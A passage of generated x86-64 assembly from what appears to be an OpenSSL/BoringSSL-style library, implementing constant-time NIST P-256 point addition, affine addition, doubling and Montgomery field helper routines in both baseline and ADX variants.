movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 320(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 320+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 512(%rsp),%xmm2
pand 512+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 416(%rsp),%xmm2
pand 416+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,32(%rdi)
movdqu %xmm3,48(%rdi)
L$add_doneq:
leaq 576+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$point_addq_epilogue:
ret
.globl _ecp_nistz256_point_add_affine_nohw
.private_extern _ecp_nistz256_point_add_affine_nohw
.p2align 5
_ecp_nistz256_point_add_affine_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $480+8,%rsp
L$add_affineq_body:
movdqu 0(%rsi),%xmm0
movq %rdx,%rbx
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
movdqu 48(%rsi),%xmm3
movdqu 64(%rsi),%xmm4
movdqu 80(%rsi),%xmm5
movq 64+0(%rsi),%rax
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
movdqa %xmm0,320(%rsp)
movdqa %xmm1,320+16(%rsp)
movdqa %xmm2,352(%rsp)
movdqa %xmm3,352+16(%rsp)
movdqa %xmm4,384(%rsp)
movdqa %xmm5,384+16(%rsp)
por %xmm4,%xmm5
movdqu 0(%rbx),%xmm0
pshufd $0xb1,%xmm5,%xmm3
movdqu 16(%rbx),%xmm1
movdqu 32(%rbx),%xmm2
por %xmm3,%xmm5
movdqu 48(%rbx),%xmm3
movdqa %xmm0,416(%rsp)
pshufd $0x1e,%xmm5,%xmm4
movdqa %xmm1,416+16(%rsp)
por %xmm0,%xmm1
.byte 102,72,15,110,199
movdqa %xmm2,448(%rsp)
movdqa %xmm3,448+16(%rsp)
por %xmm2,%xmm3
por %xmm4,%xmm5
pxor %xmm4,%xmm4
por %xmm1,%xmm3
leaq 64-0(%rsi),%rsi
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montq
pcmpeqd %xmm4,%xmm5
pshufd $0xb1,%xmm3,%xmm4
movq 0(%rbx),%rax
movq %r12,%r9
por %xmm3,%xmm4
pshufd $0,%xmm5,%xmm5
pshufd $0x1e,%xmm4,%xmm3
movq %r13,%r10
por %xmm3,%xmm4
pxor %xmm3,%xmm3
movq %r14,%r11
pcmpeqd %xmm3,%xmm4
pshufd $0,%xmm4,%xmm4
leaq 32-0(%rsp),%rsi
movq %r15,%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 320(%rsp),%rbx
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 384(%rsp),%rax
leaq 384(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 384(%rsp),%rax
leaq 384(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 288(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 448(%rsp),%rax
leaq 448(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 352(%rsp),%rbx
leaq 96(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 0+64(%rsp),%rax
movq 8+64(%rsp),%r14
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r15
movq 24+64(%rsp),%r8
leaq 128(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 0+96(%rsp),%rax
movq 8+96(%rsp),%r14
leaq 0+96(%rsp),%rsi
movq 16+96(%rsp),%r15
movq 24+96(%rsp),%r8
leaq 192(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 128(%rsp),%rax
leaq 128(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 160(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 320(%rsp),%rax
leaq 320(%rsp),%rbx
movq 0+128(%rsp),%r9
movq 8+128(%rsp),%r10
leaq 0+128(%rsp),%rsi
movq 16+128(%rsp),%r11
movq 24+128(%rsp),%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montq
xorq %r11,%r11
addq %r12,%r12
leaq 192(%rsp),%rsi
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
movq 0(%rsi),%rax
cmovcq %rbp,%r13
movq 8(%rsi),%rbp
cmovcq %rcx,%r8
movq 16(%rsi),%rcx
cmovcq %r10,%r9
movq 24(%rsi),%r10
call __ecp_nistz256_subq
leaq 160(%rsp),%rbx
leaq 224(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 0+0(%rsp),%rax
movq 0+8(%rsp),%rbp
movq 0+16(%rsp),%rcx
movq 0+24(%rsp),%r10
leaq 64(%rsp),%rdi
call __ecp_nistz256_subq
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 352(%rsp),%rax
leaq 352(%rsp),%rbx
movq 0+160(%rsp),%r9
movq 8+160(%rsp),%r10
leaq 0+160(%rsp),%rsi
movq 16+160(%rsp),%r11
movq 24+160(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 96(%rsp),%rax
leaq 96(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 64(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 32(%rsp),%rbx
leaq 256(%rsp),%rdi
call __ecp_nistz256_sub_fromq
.byte 102,72,15,126,199
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 288(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 288+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand L$ONE_mont(%rip),%xmm2
pand L$ONE_mont+16(%rip),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 384(%rsp),%xmm2
pand 384+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,64(%rdi)
movdqu %xmm3,80(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 224(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 224+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 416(%rsp),%xmm2
pand 416+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 320(%rsp),%xmm2
pand 320+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 256(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 256+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 448(%rsp),%xmm2
pand 448+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 352(%rsp),%xmm2
pand 352+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,32(%rdi)
movdqu %xmm3,48(%rdi)
leaq 480+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$add_affineq_epilogue:
ret
.p2align 5
__ecp_nistz256_add_tox:
xorq %r11,%r11
adcq 0(%rbx),%r12
adcq 8(%rbx),%r13
movq %r12,%rax
adcq 16(%rbx),%r8
adcq 24(%rbx),%r9
movq %r13,%rbp
adcq $0,%r11
xorq %r10,%r10
sbbq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.p2align 5
__ecp_nistz256_sub_fromx:
xorq %r11,%r11
sbbq 0(%rbx),%r12
sbbq 8(%rbx),%r13
movq %r12,%rax
sbbq 16(%rbx),%r8
sbbq 24(%rbx),%r9
movq %r13,%rbp
sbbq $0,%r11
xorq %r10,%r10
adcq $-1,%r12
movq %r8,%rcx
adcq %r14,%r13
adcq $0,%r8
movq %r9,%r10
adcq %r15,%r9
btq $0,%r11
cmovncq %rax,%r12
cmovncq %rbp,%r13
movq %r12,0(%rdi)
cmovncq %rcx,%r8
movq %r13,8(%rdi)
cmovncq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.p2align 5
__ecp_nistz256_subx:
xorq %r11,%r11
sbbq %r12,%rax
sbbq %r13,%rbp
movq %rax,%r12
sbbq %r8,%rcx
sbbq %r9,%r10
movq %rbp,%r13
sbbq $0,%r11
xorq %r9,%r9
adcq $-1,%rax
movq %rcx,%r8
adcq %r14,%rbp
adcq $0,%rcx
movq %r10,%r9
adcq %r15,%r10
btq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
cmovcq %rcx,%r8
cmovcq %r10,%r9
ret
.p2align 5
__ecp_nistz256_mul_by_2x:
xorq %r11,%r11
adcq %r12,%r12
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
xorq %r10,%r10
sbbq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.globl _ecp_nistz256_point_double_adx
.private_extern _ecp_nistz256_point_double_adx
.p2align 5
_ecp_nistz256_point_double_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $160+8,%rsp
L$point_doublex_body:
L$point_double_shortcutx:
movdqu 0(%rsi),%xmm0
movq %rsi,%rbx
movdqu 16(%rsi),%xmm1
movq 32+0(%rsi),%r12
movq 32+8(%rsi),%r13
movq 32+16(%rsi),%r8
movq 32+24(%rsi),%r9
movq L$poly+8(%rip),%r14
movq L$poly+24(%rip),%r15
movdqa %xmm0,96(%rsp)
movdqa %xmm1,96+16(%rsp)
leaq 32(%rdi),%r10
leaq 64(%rdi),%r11
.byte 102,72,15,110,199
.byte 102,73,15,110,202
.byte 102,73,15,110,211
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_by_2x
movq 64+0(%rsi),%rdx
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
leaq 64-128(%rsi),%rsi
leaq 64(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 0+0(%rsp),%rdx
movq 8+0(%rsp),%r14
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
leaq 0(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 32(%rbx),%rdx
movq 64+0(%rbx),%r9
movq 64+8(%rbx),%r10
movq 64+16(%rbx),%r11
movq 64+24(%rbx),%r12
leaq 64-128(%rbx),%rsi
leaq 32(%rbx),%rbx
.byte 102,72,15,126,215
call __ecp_nistz256_mul_montx
call __ecp_nistz256_mul_by_2x
movq 96+0(%rsp),%r12
movq 96+8(%rsp),%r13
leaq 64(%rsp),%rbx
movq 96+16(%rsp),%r8
movq 96+24(%rsp),%r9
leaq 32(%rsp),%rdi
call __ecp_nistz256_add_tox
movq 96+0(%rsp),%r12
movq 96+8(%rsp),%r13
leaq 64(%rsp),%rbx
movq 96+16(%rsp),%r8
movq 96+24(%rsp),%r9
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 0+0(%rsp),%rdx
movq 8+0(%rsp),%r14
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
.byte 102,72,15,126,207
call __ecp_nistz256_sqr_montx
xorq %r9,%r9
movq %r12,%rax
addq $-1,%r12
movq %r13,%r10
adcq %rsi,%r13
movq %r14,%rcx
adcq $0,%r14
movq %r15,%r8
adcq %rbp,%r15
adcq $0,%r9
xorq %rsi,%rsi
testq $1,%rax
cmovzq %rax,%r12
cmovzq %r10,%r13
cmovzq %rcx,%r14
cmovzq %r8,%r15
cmovzq %rsi,%r9
movq %r13,%rax
shrq $1,%r12
shlq $63,%rax
movq %r14,%r10
shrq $1,%r13
orq %rax,%r12
shlq $63,%r10
movq %r15,%rcx
shrq $1,%r14
orq %r10,%r13
shlq $63,%rcx
movq %r12,0(%rdi)
shrq $1,%r15
movq %r13,8(%rdi)
shlq $63,%r9
orq %rcx,%r14
orq %r9,%r15
movq %r14,16(%rdi)
movq %r15,24(%rdi)
movq 64(%rsp),%rdx
leaq 64(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_by_2x
leaq 32(%rsp),%rbx
leaq 32(%rsp),%rdi
call __ecp_nistz256_add_tox
movq 96(%rsp),%rdx
leaq 96(%rsp),%rbx
movq 0+0(%rsp),%r9
movq 8+0(%rsp),%r10
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r11
movq 24+0(%rsp),%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_by_2x
movq 0+32(%rsp),%rdx
movq 8+32(%rsp),%r14
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r15
movq 24+32(%rsp),%r8
.byte 102,72,15,126,199
call __ecp_nistz256_sqr_montx
leaq 128(%rsp),%rbx
movq %r14,%r8
movq %r15,%r9
movq %rsi,%r14
movq %rbp,%r15
call __ecp_nistz256_sub_fromx
movq 0+0(%rsp),%rax
movq 0+8(%rsp),%rbp
movq 0+16(%rsp),%rcx
movq 0+24(%rsp),%r10
leaq 0(%rsp),%rdi
call __ecp_nistz256_subx
movq 32(%rsp),%rdx
leaq 32(%rsp),%rbx
movq %r12,%r14
xorl %ecx,%ecx
movq %r12,0+0(%rsp)
movq %r13,%r10
movq %r13,0+8(%rsp)
cmovzq %r8,%r11
movq %r8,0+16(%rsp)
leaq 0-128(%rsp),%rsi
cmovzq %r9,%r12
movq %r9,0+24(%rsp)
movq %r14,%r9
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montx
.byte 102,72,15,126,203
.byte 102,72,15,126,207
call __ecp_nistz256_sub_fromx
leaq 160+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$point_doublex_epilogue:
ret
.globl _ecp_nistz256_point_add_adx
.private_extern _ecp_nistz256_point_add_adx
.p2align 5
_ecp_nistz256_point_add_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $576+8,%rsp
L$point_addx_body:
movdqu 0(%rsi),%xmm0
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
movdqu 48(%rsi),%xmm3
movdqu 64(%rsi),%xmm4
movdqu 80(%rsi),%xmm5
movq %rsi,%rbx
movq %rdx,%rsi
movdqa %xmm0,384(%rsp)
movdqa %xmm1,384+16(%rsp)
movdqa %xmm2,416(%rsp)
movdqa %xmm3,416+16(%rsp)
movdqa %xmm4,448(%rsp)
movdqa %xmm5,448+16(%rsp)
por %xmm4,%xmm5
movdqu 0(%rsi),%xmm0
pshufd $0xb1,%xmm5,%xmm3
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
por %xmm3,%xmm5
movdqu 48(%rsi),%xmm3
movq 64+0(%rsi),%rdx
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
movdqa %xmm0,480(%rsp)
pshufd $0x1e,%xmm5,%xmm4
movdqa %xmm1,480+16(%rsp)
movdqu 64(%rsi),%xmm0
movdqu 80(%rsi),%xmm1
movdqa %xmm2,512(%rsp)
movdqa %xmm3,512+16(%rsp)
por %xmm4,%xmm5
pxor %xmm4,%xmm4
por %xmm0,%xmm1
.byte 102,72,15,110,199
leaq 64-128(%rsi),%rsi
movq %rdx,544+0(%rsp)
movq %r14,544+8(%rsp)
movq %r15,544+16(%rsp)
movq %r8,544+24(%rsp)
leaq 96(%rsp),%rdi
call __ecp_nistz256_sqr_montx
pcmpeqd %xmm4,%xmm5
pshufd $0xb1,%xmm1,%xmm4
por %xmm1,%xmm4
pshufd $0,%xmm5,%xmm5
pshufd $0x1e,%xmm4,%xmm3
por %xmm3,%xmm4
pxor %xmm3,%xmm3
pcmpeqd %xmm3,%xmm4
pshufd $0,%xmm4,%xmm4
movq 64+0(%rbx),%rdx
movq 64+8(%rbx),%r14
movq 64+16(%rbx),%r15
movq 64+24(%rbx),%r8
.byte 102,72,15,110,203
leaq 64-128(%rbx),%rsi
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 544(%rsp),%rdx
leaq 544(%rsp),%rbx
movq 0+96(%rsp),%r9
movq 8+96(%rsp),%r10
leaq -128+96(%rsp),%rsi
movq 16+96(%rsp),%r11
movq 24+96(%rsp),%r12
leaq 224(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 448(%rsp),%rdx
leaq 448(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 416(%rsp),%rdx
leaq 416(%rsp),%rbx
movq 0+224(%rsp),%r9
movq 8+224(%rsp),%r10
leaq -128+224(%rsp),%rsi
movq 16+224(%rsp),%r11
movq 24+224(%rsp),%r12
leaq 224(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 512(%rsp),%rdx
leaq 512(%rsp),%rbx
movq 0+256(%rsp),%r9
movq 8+256(%rsp),%r10
leaq -128+256(%rsp),%rsi
movq 16+256(%rsp),%r11
movq 24+256(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 224(%rsp),%rbx
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromx
orq %r13,%r12
movdqa %xmm4,%xmm2
orq %r8,%r12
orq %r9,%r12
por %xmm5,%xmm2
.byte 102,73,15,110,220
movq 384(%rsp),%rdx
leaq 384(%rsp),%rbx
movq 0+96(%rsp),%r9
movq 8+96(%rsp),%r10
leaq -128+96(%rsp),%rsi
movq 16+96(%rsp),%r11
movq 24+96(%rsp),%r12
leaq 160(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 480(%rsp),%rdx
leaq 480(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 192(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 160(%rsp),%rbx
leaq 0(%rsp),%rdi
call __ecp_nistz256_sub_fromx
orq %r13,%r12
orq %r8,%r12
orq %r9,%r12
.byte 102,73,15,126,208
.byte 102,73,15,126,217
orq %r8,%r12
.byte 0x3e
jnz L$add_proceedx
testq %r9,%r9
jz L$add_doublex
.byte 102,72,15,126,199
pxor %xmm0,%xmm0
movdqu %xmm0,0(%rdi)
movdqu %xmm0,16(%rdi)
movdqu %xmm0,32(%rdi)
movdqu %xmm0,48(%rdi)
movdqu %xmm0,64(%rdi)
movdqu %xmm0,80(%rdi)
jmp L$add_donex
.p2align 5
L$add_doublex:
.byte 102,72,15,126,206
.byte 102,72,15,126,199
addq $416,%rsp
jmp L$point_double_shortcutx
.p2align 5
L$add_proceedx:
movq 0+64(%rsp),%rdx
movq 8+64(%rsp),%r14
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r15
movq 24+64(%rsp),%r8
leaq 96(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 448(%rsp),%rdx
leaq 448(%rsp),%rbx
movq 0+0(%rsp),%r9
movq 8+0(%rsp),%r10
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r11
movq 24+0(%rsp),%r12
leaq 352(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 0+0(%rsp),%rdx
movq 8+0(%rsp),%r14
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 544(%rsp),%rdx
leaq 544(%rsp),%rbx
movq 0+352(%rsp),%r9
movq 8+352(%rsp),%r10
leaq -128+352(%rsp),%rsi
movq 16+352(%rsp),%r11
movq 24+352(%rsp),%r12
leaq 352(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 0(%rsp),%rdx
leaq 0(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 160(%rsp),%rdx
leaq 160(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 192(%rsp),%rdi
call __ecp_nistz256_mul_montx
xorq %r11,%r11
addq %r12,%r12
leaq 96(%rsp),%rsi
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
movq 0(%rsi),%rax
cmovcq %rbp,%r13
movq 8(%rsi),%rbp
cmovcq %rcx,%r8
movq 16(%rsi),%rcx
cmovcq %r10,%r9
movq 24(%rsi),%r10
call __ecp_nistz256_subx
leaq 128(%rsp),%rbx
leaq 288(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 192+0(%rsp),%rax
movq 192+8(%rsp),%rbp
movq 192+16(%rsp),%rcx
movq 192+24(%rsp),%r10
leaq 320(%rsp),%rdi
call __ecp_nistz256_subx
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 128(%rsp),%rdx
leaq 128(%rsp),%rbx
movq 0+224(%rsp),%r9
movq 8+224(%rsp),%r10
leaq -128+224(%rsp),%rsi
movq 16+224(%rsp),%r11
movq 24+224(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 320(%rsp),%rdx
leaq 320(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 320(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 256(%rsp),%rbx
leaq 320(%rsp),%rdi
call __ecp_nistz256_sub_fromx
.byte 102,72,15,126,199
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 352(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 352+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 544(%rsp),%xmm2
pand 544+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 448(%rsp),%xmm2
pand 448+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,64(%rdi)
movdqu %xmm3,80(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 288(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 288+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 480(%rsp),%xmm2
pand 480+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 384(%rsp),%xmm2
pand 384+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 320(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 320+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 512(%rsp),%xmm2
pand 512+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 416(%rsp),%xmm2
pand 416+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,32(%rdi)
movdqu %xmm3,48(%rdi)
L$add_donex:
leaq 576+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$point_addx_epilogue:
ret
.globl _ecp_nistz256_point_add_affine_adx
.private_extern _ecp_nistz256_point_add_affine_adx
.p2align 5
_ecp_nistz256_point_add_affine_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $480+8,%rsp
L$add_affinex_body:
movdqu 0(%rsi),%xmm0
movq %rdx,%rbx
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
movdqu 48(%rsi),%xmm3
movdqu 64(%rsi),%xmm4
movdqu 80(%rsi),%xmm5
movq 64+0(%rsi),%rdx
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
movdqa %xmm0,320(%rsp)
movdqa %xmm1,320+16(%rsp)
movdqa %xmm2,352(%rsp)
movdqa %xmm3,352+16(%rsp)
movdqa %xmm4,384(%rsp)
movdqa %xmm5,384+16(%rsp)
por %xmm4,%xmm5
movdqu 0(%rbx),%xmm0
pshufd $0xb1,%xmm5,%xmm3
movdqu 16(%rbx),%xmm1
movdqu 32(%rbx),%xmm2
por %xmm3,%xmm5
movdqu 48(%rbx),%xmm3
movdqa %xmm0,416(%rsp)
pshufd $0x1e,%xmm5,%xmm4
movdqa %xmm1,416+16(%rsp)
por %xmm0,%xmm1
.byte 102,72,15,110,199
movdqa %xmm2,448(%rsp)
movdqa %xmm3,448+16(%rsp)
por %xmm2,%xmm3
por %xmm4,%xmm5
pxor %xmm4,%xmm4
por %xmm1,%xmm3
leaq 64-128(%rsi),%rsi
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montx
pcmpeqd %xmm4,%xmm5
pshufd $0xb1,%xmm3,%xmm4
movq 0(%rbx),%rdx
movq %r12,%r9
por %xmm3,%xmm4
pshufd $0,%xmm5,%xmm5
pshufd $0x1e,%xmm4,%xmm3
movq %r13,%r10
